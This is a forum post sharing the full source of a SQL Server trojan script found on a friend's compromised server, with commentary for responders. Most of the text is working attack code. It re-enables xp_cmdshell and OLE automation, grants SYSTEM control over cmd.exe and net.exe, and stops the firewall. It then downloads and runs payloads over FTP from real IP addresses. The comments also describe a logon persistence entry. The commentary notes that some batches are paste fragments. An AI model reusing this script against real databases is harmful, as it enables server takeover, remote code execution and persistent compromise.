sql木马脚本
发一段sql写的木马脚本,删除也很简单,就不写了。
昨天一位朋友告诉我他的网站崩了。我登录他的服务器,没看到文件有什么异常;再看数据库,天啊,SQL木马脚本!写这东西的人还真有才,呵呵。不过我一下就把它删了。以下是脚本的全部源码,大家学习一下可以,千万不要拿来搞破坏哦,要不以后我不发这些源码类的东西了。
Powered By Error Q:302777528
go
-- Phase 1: replace sp_dropextendedproc in master with a thin wrapper around
-- DBCC DROPEXTENDEDPROC, which later batches use to unregister extended procedures.
-- NOTE(review): as pasted, CREATE PROCEDURE follows USE/DROP inside one batch; SQL Server
-- requires CREATE PROCEDURE to be the first statement of a batch, so a `go` separator was
-- probably lost when the script was copied to this page.
-- For responders: a user-created dbo.sp_dropextendedproc in master is an artifact of this script.
use Master
If object_id('sp_dropextendedproc') is not null
drop procedure sp_dropextendedproc
create procedure dbo.sp_dropextendedproc
@functname nvarchar(517) -- name of the extended procedure to unregister
as
-- If we're in a transaction, disallow the dropping of the
-- extended stored procedure.
set implicit_transactions off
if @@trancount > 0
begin
-- Error 15002 is raised and the procedure returns 1 when called inside an open transaction.
raiserror(15002,-1,-1,'sys.sp_dropextendedproc')
return (1)
end
-- Drop the extended procedure mapping.
dbcc dropextendedproc( @functname )
return (0) -- sp_dropextendedproc
go
-- Phase 2: turn on three server options that SQL Server 2005 and later ship disabled:
--   xp_cmdshell                -> operating-system command execution from T-SQL
--   Ad Hoc Distributed Queries -> OPENROWSET/OPENDATASOURCE against arbitrary providers
--   Ole Automation Procedures  -> sp_OACreate/sp_OAMethod (COM objects such as wscript.shell)
-- Changing these with sp_configure needs ALTER SETTINGS (sysadmin/serveradmin), so the login
-- running this script already had administrative rights on the instance; the page does not
-- say how that access was obtained.
-- For responders: compare sys.configurations against your baseline and look for the
-- corresponding "Configuration option ... changed" entries in the SQL Server error log.
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure
'xp_cmdshell', 1;RECONFIGURE;
go
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure
'Ad Hoc Distributed Queries',1;RECONFIGURE;
go
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure
'Ole Automation Procedures',1;RECONFIGURE;
go
-- Phase 3: re-register extended procedures, then reset file ACLs through COM automation.
use Master
-- Removes the wrapper procedure that the first batch of the script created.
If object_id('sp_dropextendedproc') is not null
drop procedure sp_dropextendedproc
-- Drop-then-add pairs re-bind each extended procedure to its DLL: xp_dirtree, xp_regread and
-- xp_regwrite to xpstar.dll; sp_OACreate and sp_OAMethod to odsole70.dll.
-- Presumably this undoes hardening in which an administrator had unregistered them.
dbcc dropextendedproc ("xp_dirtree");
dbcc addextendedproc ("xp_dirtree","xpstar.dll");
dbcc dropextendedproc ("xp_regread");
dbcc addextendedproc ("xp_regread","xpstar.dll");
dbcc dropextendedproc ("xp_regwrite");
dbcc addextendedproc ("xp_regwrite","xpstar.dll");
dbcc dropextendedproc ("sp_OACreate");
dbcc addextendedproc ("sp_OACreate","odsole70.dll");
dbcc dropextendedproc ("sp_OAMethod");
dbcc addextendedproc ("sp_OAMethod","odsole70.dll");
-- The 27 statements below all have the same shape: create a wscript.shell COM object and call
-- its Run method with "<tool> <target> /e /g system:f". The arguments are cacls syntax:
-- /e edits the existing ACL, /g system:f grants the SYSTEM account full control.
-- Targets are cmd.exe, net1.exe and net.exe. The tool names (wbem\sr, wbem\sp, ws, wbem\we,
-- wbem\xj, drivers\vs, cs, drivers\vsx, wbem\wbemfest) are presumably renamed copies of
-- cacls.exe dropped earlier; other parts of this script show that only for cs.exe and ws.exe.
-- Return codes from sp_oacreate/sp_oamethod are never checked, so each line is best-effort.
-- For responders: look for these file names under the system directory and for unexpected
-- SYSTEM:F entries on cmd.exe / net.exe / net1.exe.
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'wbem\sr cmd.exe /e /g system:f'
declare @shell1 int exec sp_oacreate 'wscript.shell',@shell1 output exec sp_oamethod @shell1,'run',null,'wbem\sr net1.exe /e /g system:f'
declare @shell2 int exec sp_oacreate 'wscript.shell',@shell2 output exec sp_oamethod @shell2,'run',null,'wbem\sr net.exe /e /g system:f'
declare @shell3 int exec sp_oacreate 'wscript.shell',@shell3 output exec sp_oamethod @shell3,'run',null,'wbem\sp cmd.exe /e /g system:f'
declare @shell4 int exec sp_oacreate 'wscript.shell',@shell4 output exec sp_oamethod @shell4,'run',null,'wbem\sp net1.exe /e /g system:f'
declare @shell5 int exec sp_oacreate 'wscript.shell',@shell5 output exec sp_oamethod @shell5,'run',null,'wbem\sp net.exe /e /g system:f'
declare @shell6 int exec sp_oacreate 'wscript.shell',@shell6 output exec sp_oamethod @shell6,'run',null,'ws cmd.exe /e /g system:f'
declare @shell7 int exec sp_oacreate 'wscript.shell',@shell7 output exec sp_oamethod @shell7,'run',null,'ws net1.exe /e /g system:f'
declare @shell8 int exec sp_oacreate 'wscript.shell',@shell8 output exec sp_oamethod @shell8,'run',null,'ws net.exe /e /g system:f'
declare @shell9 int exec sp_oacreate 'wscript.shell',@shell9 output exec sp_oamethod @shell9,'run',null,'wbem\we cmd.exe /e /g system:f'
declare @shell10 int exec sp_oacreate 'wscript.shell',@shell10 output exec sp_oamethod @shell10,'run',null,'wbem\we net1.exe /e /g system:f'
declare @shell11 int exec sp_oacreate 'wscript.shell',@shell11 output exec sp_oamethod @shell11,'run',null,'wbem\we net.exe /e /g system:f'
declare @shell12 int exec sp_oacreate 'wscript.shell',@shell12 output exec sp_oamethod @shell12,'run',null,'wbem\xj cmd.exe /e /g system:f'
declare @shell13 int exec sp_oacreate 'wscript.shell',@shell13 output exec sp_oamethod @shell13,'run',null,'wbem\xj net1.exe /e /g system:f'
declare @shell14 int exec sp_oacreate 'wscript.shell',@shell14 output exec sp_oamethod @shell14,'run',null,'wbem\xj net.exe /e /g system:f'
declare @shell15 int exec sp_oacreate 'wscript.shell',@shell15 output exec sp_oamethod @shell15,'run',null,'drivers\vs cmd.exe /e /g system:f'
declare @shell16 int exec sp_oacreate 'wscript.shell',@shell16 output exec sp_oamethod @shell16,'run',null,'drivers\vs net1.exe /e /g system:f'
declare @shell17 int exec sp_oacreate 'wscript.shell',@shell17 output exec sp_oamethod @shell17,'run',null,'drivers\vs net.exe /e /g system:f'
declare @shell18 int exec sp_oacreate 'wscript.shell',@shell18 output exec sp_oamethod @shell18,'run',null,'cs cmd.exe /e /g system:f'
declare @shell19 int exec sp_oacreate 'wscript.shell',@shell19 output exec sp_oamethod @shell19,'run',null,'cs net1.exe /e /g system:f'
declare @shell20 int exec sp_oacreate 'wscript.shell',@shell20 output exec sp_oamethod @shell20,'run',null,'cs net.exe /e /g system:f'
declare @shell21 int exec sp_oacreate 'wscript.shell',@shell21 output exec sp_oamethod @shell21,'run',null,'drivers\vsx cmd.exe /e /g system:f'
declare @shell22 int exec sp_oacreate 'wscript.shell',@shell22 output exec sp_oamethod @shell22,'run',null,'drivers\vsx net1.exe /e /g system:f'
declare @shell23 int exec sp_oacreate 'wscript.shell',@shell23 output exec sp_oamethod @shell23,'run',null,'drivers\vsx net.exe /e /g system:f'
declare @shell24 int exec sp_oacreate 'wscript.shell',@shell24 output exec sp_oamethod @shell24,'run',null,'wbem\wbemfest cmd.exe /e /g system:f'
declare @shell25 int exec sp_oacreate 'wscript.shell',@shell25 output exec sp_oamethod @shell25,'run',null,'wbem\wbemfest net1.exe /e /g system:f'
declare @shell26 int exec sp_oacreate 'wscript.shell',@shell26 output exec sp_oamethod @shell26,'run',null,'wbem\wbemfest net.exe /e /g system:f'
go
-- Phase 4: use xp_makecab / xp_unpackcab as a file-copy primitive to put extended-procedure
-- DLLs back in place. Each xp_makecab packs one DLL from an X:\SQL2KSP4\x86\binn folder
-- (looks like an unpacked SQL Server 2000 SP4 installer; assumption) into
-- C:\Windows\System\N.Zip, and the xp_unpackcab lines extract it again.
-- The C:, D: and E: variants are guesses at where the installer and the instance live;
-- lines whose source or destination does not exist will simply fail.
-- For responders: leftover C:\Windows\System\1.Zip .. 9.Zip files are artifacts of this phase.
-- Archives 1-3: odsole70.dll (the DLL behind sp_OACreate/sp_OAMethod) into the MSSQL\Binn folder.
exec xp_makecab 'C:\Windows\System\1.Zip', 'None', 1, 'C:\SQL2KSP4\x86\binn\odsole70.dll'
exec xp_unpackcab 'C:\Windows\System\1.Zip','C:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
exec xp_unpackcab 'C:\Windows\System\1.Zip','D:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
exec xp_unpackcab 'C:\Windows\System\1.Zip','E:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
exec xp_makecab 'C:\Windows\System\2.Zip', 'None', 1, 'D:\SQL2KSP4\x86\binn\odsole70.dll'
exec xp_unpackcab 'C:\Windows\System\2.Zip','C:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
exec xp_unpackcab 'C:\Windows\System\2.Zip','D:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
exec xp_unpackcab 'C:\Windows\System\2.Zip','E:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
exec xp_makecab 'C:\Windows\System\3.Zip', 'None', 1, 'E:\SQL2KSP4\x86\binn\odsole70.dll'
exec xp_unpackcab 'C:\Windows\System\3.Zip','C:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
exec xp_unpackcab 'C:\Windows\System\3.Zip','D:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
exec xp_unpackcab 'C:\Windows\System\3.Zip','E:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
-- Archives 4-6: xplog70.dll (the DLL this script binds xp_cmdshell to), unpacked into
-- C:\Windows\System rather than the Binn folder.
exec xp_makecab 'C:\Windows\System\4.Zip', 'None', 1, 'C:\SQL2KSP4\x86\binn\xplog70.dll'
exec xp_unpackcab 'C:\Windows\System\4.Zip','C:\Windows\System',1
exec xp_makecab 'C:\Windows\System\5.Zip', 'None', 1, 'D:\SQL2KSP4\x86\binn\xplog70.dll'
exec xp_unpackcab 'C:\Windows\System\5.Zip','C:\Windows\System',1
exec xp_makecab 'C:\Windows\System\6.Zip', 'None', 1, 'E:\SQL2KSP4\x86\binn\xplog70.dll'
exec xp_unpackcab 'C:\Windows\System\6.Zip','C:\Windows\System',1
-- Archives 7-9: xpstar.dll (xp_dirtree / xp_regread / xp_regwrite) into the MSSQL\Binn folder.
exec xp_makecab 'C:\Windows\System\7.Zip', 'None', 1, 'C:\SQL2KSP4\x86\binn\xpstar.dll'
exec xp_unpackcab 'C:\Windows\System\7.Zip','C:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
exec xp_unpackcab 'C:\Windows\System\7.Zip','D:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
exec xp_unpackcab 'C:\Windows\System\7.Zip','E:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
exec xp_makecab 'C:\Windows\System\8.Zip', 'None', 1, 'D:\SQL2KSP4\x86\binn\xpstar.dll'
exec xp_unpackcab 'C:\Windows\System\8.Zip','C:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
exec xp_unpackcab 'C:\Windows\System\8.Zip','D:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
exec xp_unpackcab 'C:\Windows\System\8.Zip','E:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
exec xp_makecab 'C:\Windows\System\9.Zip', 'None', 1, 'E:\SQL2KSP4\x86\binn\xpstar.dll'
exec xp_unpackcab 'C:\Windows\System\9.Zip','C:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
exec xp_unpackcab 'C:\Windows\System\9.Zip','D:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
exec xp_unpackcab 'C:\Windows\System\9.Zip','E:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
go
-- Phase 5: start SQL Server Agent, then fetch and run a payload over FTP.
-- Starting the Agent service gives the instance a job scheduler; no job is created in the
-- part of the script shown here.
exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT'
go
-- The three identical SELECTs against syscharsets (and the sp_help_alert call further down)
-- have no effect on the host; they look like management-tool traffic captured along with the
-- script (assumption). SET QUOTED_IDENTIFIER OFF lets double-quoted text such as "xp_cmdshell"
-- be parsed as a string literal, but only for the rest of its own batch.
select 504,c.name,c.description,c.definition from master.dbo.syscharsets c where c.id = convert(tinyint, databasepropertyex ( db_name() , 'sqlcharset')) set quoted_identifier off
go
select 504,c.name,c.description,c.definition from master.dbo.syscharsets c where c.id = convert(tinyint, databasepropertyex ( db_name() , 'sqlcharset')) set quoted_identifier off
go
select 504,c.name,c.description,c.definition from master.dbo.syscharsets c where c.id = convert(tinyint, databasepropertyex ( db_name() , 'sqlcharset')) set quoted_identifier off
go
-- Download-and-execute via xp_cmdshell. The command line: stops the SharedAccess service
-- (Windows Firewall/ICS on older Windows), writes an FTP command file cmd.txt (server
-- 58.218.202.35, user "123", password "521", binary mode, get cao.exe), runs it with ftp and
-- with p (elsewhere this script copies ftp.exe to p.exe), starts cao.exe twice and deletes
-- cmd.txt.
-- Indicators from this line: 58.218.202.35, cao.exe, cmd.txt, a stopped SharedAccess service.
-- Detection: sqlservr.exe spawning cmd.exe/ftp.exe, and outbound FTP from a database server.
exec master..xp_cmdshell 'net1 stop sharedaccess&echo open 58.218.202.35> cmd.txt&echo 123>> cmd.txt&echo 521>> cmd.txt&echo binary >> cmd.txt&echo get cao.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&cao.exe&cao.exe&del cmd.txt /q /f&exit'
go
EXECUTE msdb.dbo.sp_help_alert @order_by = N'severity ASC, message_id ASC, database_name DESC'
go
-- Same download sequence through OLE automation (wscript.shell) instead of xp_cmdshell, so it
-- still works where xp_cmdshell is unavailable. The payload name here is cao1.exe.
declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',null,'cmd /c "net1 stop sharedaccess&echo open 58.218.202.35> cmd.txt&echo 123>> cmd.txt&echo 521>> cmd.txt&echo binary >> cmd.txt&echo get cao1.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&cao1.exe&cao1.exe&del cmd.txt /q /f&exit"'
go
-- Phase 6: drop and re-create the procedures used to register extended procedures.
-- NOTE(review): several batches in this phase are fragments that cannot run as pasted: the IF
-- below has no statement before `go`, @ObjectToken is never declared, and sp_OASetProperty is
-- called without a property or value. Treat them as paste residue, not working steps.
if(@@version like 'Microsoft SQL Server 2000%')
go
-- Drops any dbo-owned objects with these names. sp_trace_setstatus is the procedure that
-- starts and stops SQL Trace; removing it would interfere with tracing
-- (NOTE(review): assumes the drop succeeds, which depends on the SQL Server version).
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_trace_setstatus]'))drop procedure sp_trace_setstatus
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[xp_regwrite]'))drop procedure xp_regwrite
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_addextendedproc]'))drop procedure sp_addextendedproc
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OACreate]'))drop procedure sp_oacreate
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OASetProperty]'))drop procedure sp_OASetProperty
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OADestroy]'))drop procedure sp_OADestroy
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OAMethod]'))drop procedure sp_OAMethod;
go
-- Re-creates sp_addextendedproc as a wrapper around DBCC ADDEXTENDEDPROC(@functname, @dllname);
-- it raises error 15002 and returns 1 when called inside an open transaction.
create procedure sp_addextendedproc @functname nvarchar(517),@dllname varchar(255) as set implicit_transactions off if @@trancount > 0 begin raiserror(15002,-1,-1,'sp_addextendedproc') return (1) end dbcc addextendedproc( @functname, @dllname) return (0);
use master
go
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
go
-- Binds xp_cmdshell to xplog70.dll, then tries xpsql70.dll as an alternative DLL name.
EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
go
exec sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
go
EXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUT
go
EXEC sp_OASetProperty @ObjectToken
go
-- The same drop / re-add cycle for sp_oacreate and xp_cmdshell is repeated twice below.
drop procedure sp_addextendedproc
go
drop procedure sp_oacreate
go
exec sp_dropextendedproc 'xp_cmdshell'
go
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
go
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
go
drop procedure sp_addextendedproc
go
drop procedure sp_oacreate
go
exec sp_dropextendedproc 'xp_cmdshell'
go
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
go
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
go
-- Phase 7: bulk (re)registration of extended procedures.
-- Each procedure is registered against several DLL names (plain, 70 and 90 suffixes). This
-- reads as a version-agnostic attempt in which the lines that do not match the installed
-- SQL Server release are expected to fail (assumption; no error handling is present).
-- Capabilities being restored, by procedure family:
--   xp_cmdshell                       OS command execution
--   xp_dirtree, xp_fixeddrives, xp_availablemedia, xp_getfiledetails   file-system discovery
--   xp_reg*                           registry read / write / delete
--   sp_OA*                            COM automation
--   xp_enumgroups, xp_loginconfig, xp_enumerrorlogs   account, login-config and log enumeration
-- For responders: after an incident, list the extended procedures registered in master and
-- compare the procedure-to-DLL bindings with a clean instance of the same version.
dbcc dropextendedproc ("xp_cmdshell");
dbcc addextendedproc ("xp_cmdshell","xplog70.dll");
dbcc dropextendedproc ("xp_dirtree");
dbcc addextendedproc ("xp_dirtree","xpstar.dll");
dbcc dropextendedproc ("xp_regread");
dbcc addextendedproc ("xp_regread","xpstar.dll");
dbcc dropextendedproc ("xp_regwrite");
dbcc addextendedproc ("xp_regwrite","xpstar.dll");
dbcc dropextendedproc ("sp_OACreate");
dbcc addextendedproc ("sp_OACreate","odsole70.dll");
dbcc dropextendedproc ("sp_OAMethod");
dbcc addextendedproc ("sp_OAMethod","odsole70.dll");
exec sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'
exec sp_addextendedproc xp_cmdshell,@dllname ='xplog90.dll'
EXEC sp_addextendedproc xp_cmdshell,@dllname ='xpweb70.dll'
EXEC sp_addextendedproc xp_cmdshell,@dllname ='xpweb90.dll'
EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog90.dll'declare @o int
exec sp_addextendedproc xp_cmdshell,'xp_cmdshell.dll'
exec sp_addextendedproc xp_dirtree,'xpstar.dll'
exec sp_addextendedproc xp_dirtree,'xpstar70.dll'
exec sp_addextendedproc xp_dirtree,'xpstar90.dll'
exec sp_addextendedproc xp_enumgroups,'xplog70.dll'
exec sp_addextendedproc xp_enumgroups,'xplog90.dll'
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'
exec sp_addextendedproc xp_fixeddrives,'xpstar70.dll'
exec sp_addextendedproc xp_fixeddrives,'xpstar90.dll'
exec sp_addextendedproc xp_loginconfig,'xplog70.dll'
exec sp_addextendedproc xp_loginconfig,'xplog90.dll'
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
exec sp_addextendedproc xp_enumerrorlogs,'xpstar70.dll'
exec sp_addextendedproc xp_enumerrorlogs,'xpstar90.dll'
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
exec sp_addextendedproc xp_getfiledetails,'xpstar70.dll'
exec sp_addextendedproc xp_getfiledetails,'xpstar90.dll'
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
exec sp_addextendedproc sp_OACreate,'odsole90.dll'
exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
exec sp_addextendedproc sp_OADestroy,'odsole90.dll'
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole90.dll'
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAGetProperty,'odsole90.dll'
exec sp_addextendedproc sp_OAMethod,'odsole70.dll'
exec sp_addextendedproc sp_OAMethod,'odsole90.dll'
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
exec sp_addextendedproc sp_OACreate,'odsole90.dll'
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OASetProperty,'odsole90.dll'
exec sp_addextendedproc sp_OAStop,'odsole70.dll'
exec sp_addextendedproc sp_OAStop,'odsole90.dll'
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
exec sp_addextendedproc xp_regaddmultistring,'xpstar70.dll'
exec sp_addextendedproc xp_regaddmultistring,'xpstar90.dll'
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
exec sp_addextendedproc xp_regdeletekey,'xpstar70.dll'
exec sp_addextendedproc xp_regdeletekey,'xpstar90.dll'
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
exec sp_addextendedproc xp_regdeletevalue,'xpstar70.dll'
exec sp_addextendedproc xp_regdeletevalue,'xpstar90.dll'
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
exec sp_addextendedproc xp_regenumvalues,'xpstar70.dll'
exec sp_addextendedproc xp_regenumvalues,'xpstar90.dll'
exec sp_addextendedproc xp_regread,'xpstar.dll'
exec sp_addextendedproc xp_regread,'xpstar70.dll'
exec sp_addextendedproc xp_regread,'xpstar90.dll'
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'
exec sp_addextendedproc xp_regremovemultistring,'xpstar70.dll'
exec sp_addextendedproc xp_regremovemultistring,'xpstar90.dll'
exec sp_addextendedproc xp_regwrite,'xpstar.dll'
exec sp_addextendedproc xp_regwrite,'xpstar70.dll'
exec sp_addextendedproc xp_regwrite,'xpstar90.dll'
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'
exec sp_addextendedproc xp_availablemedia,'xpstar70.dll'
exec sp_addextendedproc xp_availablemedia,'xpstar90.dll'
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
go
-- NOTE(review): the three lines below are the tail of a sp_dropextendedproc body with no
-- CREATE PROCEDURE header; @functname is undeclared here, so this batch is a paste fragment.
-- Drop the extended procedure mapping.
dbcc dropextendedproc( @functname )
return (0) -- sp_dropextendedproc
GO
-- Phase 8: make renamed copies of system tools and reset ACLs with them. The two batches
-- below are identical except for the last target (msado15.dll in the first, ftp.exe in the
-- second).
-- NOTE(review): sp_configure here is not followed by RECONFIGURE, so on its own this line
-- does not change the running value.
exec sp_configure 'show advanced options', 1;
-- Registers the four OLE automation procedures against odsole70.dll if they are missing.
if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OACreate]'))dbcc addextendedproc ('sp_OACreate','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OASetProperty]'))dbcc addextendedproc ('sp_OASetProperty','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OADestroy]'))dbcc addextendedproc ('sp_OADestroy','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OAMethod]'))dbcc addextendedproc ('sp_OAMethod','odsole70.dll');
-- scripting.filesystemobject CopyFile: ftp.exe -> p.exe and cacls.exe -> cs.exe, each tried
-- from system32 and from system32\dllcache. Renamed copies sidestep ACLs or name-based
-- blocking placed on the original binaries (presumed intent).
-- For responders: c:\windows\system32\p.exe and c:\windows\system32\cs.exe are artifacts.
declare @passwordo2 int;exec sp_oacreate 'scripting.filesystemobject', @passwordo2 out;exec sp_oamethod @passwordo2, 'copyfile',null,'c:\windows\system32\ftp.exe' ,'c:\windows\system32\p.exe';
declare @passwordo3 int;exec sp_oacreate 'scripting.filesystemobject', @passwordo3 out;exec sp_oamethod @passwordo3, 'copyfile',null,'c:\windows\system32\dllcache\cacls.exe' ,'c:\windows\system32\cs.exe';
declare @passwordo int;exec sp_oacreate 'scripting.filesystemobject', @passwordo out;exec sp_oamethod @passwordo, 'copyfile',null,'c:\windows\system32\cacls.exe' ,'c:\windows\system32\cs.exe';
declare @passwordo4 int;exec sp_oacreate 'scripting.filesystemobject', @passwordo4 out;exec sp_oamethod @passwordo4, 'copyfile',null,'c:\windows\system32\dllcache\ftp.exe' ,'c:\windows\system32\p.exe';
-- Runs the cacls copy (cs.exe) with /e /t /g system:F: edit the ACL, apply to matching files
-- in subdirectories, grant SYSTEM full control. Targets: cmd.exe, net1.scr and msado15.dll.
-- @passwordcmdcov is created but never used for a Run call.
declare @passwordcmdcov INT;declare @passwordcmdcov1 INT;declare @passwordftpcov INT;exec sp_OACreate 'wscript.shell',@passwordcmdcov output;exec sp_OACreate 'wscript.shell',@passwordcmdcov1 output;exec sp_OACreate 'wscript.shell',@passwordftpcov output;exec sp_OAMethod @passwordftpcov,'run',null,'cs.exe %SystemRoot%\system32\cmd.exe /e /t /g system:F';exec sp_OAMethod @passwordcmdcov1,'run',null,'cs.exe %SystemRoot%\system32\net1.scr /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'cs.exe C:\Progra~1\Common~1\System\ado\msado15.dll /e /t /g system:F';
go
exec sp_configure 'show advanced options', 1;
if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OACreate]'))dbcc addextendedproc ('sp_OACreate','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OASetProperty]'))dbcc addextendedproc ('sp_OASetProperty','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OADestroy]'))dbcc addextendedproc ('sp_OADestroy','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OAMethod]'))dbcc addextendedproc ('sp_OAMethod','odsole70.dll');
declare @passwordo2 int;exec sp_oacreate 'scripting.filesystemobject', @passwordo2 out;exec sp_oamethod @passwordo2, 'copyfile',null,'c:\windows\system32\ftp.exe' ,'c:\windows\system32\p.exe';
declare @passwordo3 int;exec sp_oacreate 'scripting.filesystemobject', @passwordo3 out;exec sp_oamethod @passwordo3, 'copyfile',null,'c:\windows\system32\dllcache\cacls.exe' ,'c:\windows\system32\cs.exe';
declare @passwordo int;exec sp_oacreate 'scripting.filesystemobject', @passwordo out;exec sp_oamethod @passwordo, 'copyfile',null,'c:\windows\system32\cacls.exe' ,'c:\windows\system32\cs.exe';
declare @passwordo4 int;exec sp_oacreate 'scripting.filesystemobject', @passwordo4 out;exec sp_oamethod @passwordo4, 'copyfile',null,'c:\windows\system32\dllcache\ftp.exe' ,'c:\windows\system32\p.exe';
-- Same as the previous batch, with ftp.exe as the third ACL target.
declare @passwordcmdcov INT;declare @passwordcmdcov1 INT;declare @passwordftpcov INT;exec sp_OACreate 'wscript.shell',@passwordcmdcov output;exec sp_OACreate 'wscript.shell',@passwordcmdcov1 output;exec sp_OACreate 'wscript.shell',@passwordftpcov output;exec sp_OAMethod @passwordftpcov,'run',null,'cs.exe %SystemRoot%\system32\cmd.exe /e /t /g system:F';exec sp_OAMethod @passwordcmdcov1,'run',null,'cs.exe %SystemRoot%\system32\net1.scr /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'cs.exe %SystemRoot%\system32\ftp.exe /e /t /g system:F';
go
-- Phase 9: prepare a Jet-based execution path, start a dropped binary, reset xp_cmdshell.
-- Writes HKLM\SOFTWARE\Microsoft\Jet\4.0\Engines\SandBoxMode = 1. The Jet sandbox is what
-- blocks unsafe expression functions in queries; lowering it, together with an enabled
-- 'Ad Hoc Distributed Queries' option, opens a command-execution route through Jet queries.
-- NOTE(review): confirm the exact meaning of each SandBoxMode value against Microsoft's
-- documentation before using it as a baseline check.
-- For responders: restore this value to the organisation's baseline during cleanup.
exec master..xp_regwrite'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
go
-- Starts mcsql.exe through wscript.shell. The binary is not created anywhere in the part of
-- the script shown on this page; treat the file name as an indicator.
DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'mcsql.exe'--
go
-- Creates a Jet (Microsoft.Jet.OLEDB.4.0) database file named SysS.xml via ADOX.Catalog.
-- The relative path resolves against the server process's working directory. @hr receives the
-- HRESULT of each call but is never inspected.
declare @hr int
declare @object int;declare @property int
exec @hr = sp_OACreate 'ADOX.Catalog',@object OUTPUT
exec @hr = sp_OAMethod @object,'Create',@property output,'Provider=Microsoft.Jet.OLEDB.4.0;Data Source=SysS.xml'
go
-- Drops any existing xp_cmdshell object and re-binds the name to xplog70.dll.
drop procedure xp_cmdshell
go
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
go
-- Phase 10: persistence. xp_regwrite stores a command line in the value "shell" under
-- HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, a key Windows processes at logon. The
-- command repeats the FTP download pattern used elsewhere in the script: stop SharedAccess,
-- build cmd.txt (server 183.67.206.51, user "123", password "123", binary, get 1.exe), run it
-- with ftp and p, execute the payload twice, delete cmd.txt.
-- For responders: deleting objects from the database does not undo this. Check and remove the
-- Run value "shell", and treat 183.67.206.51, 1.exe and 123.exe as indicators.
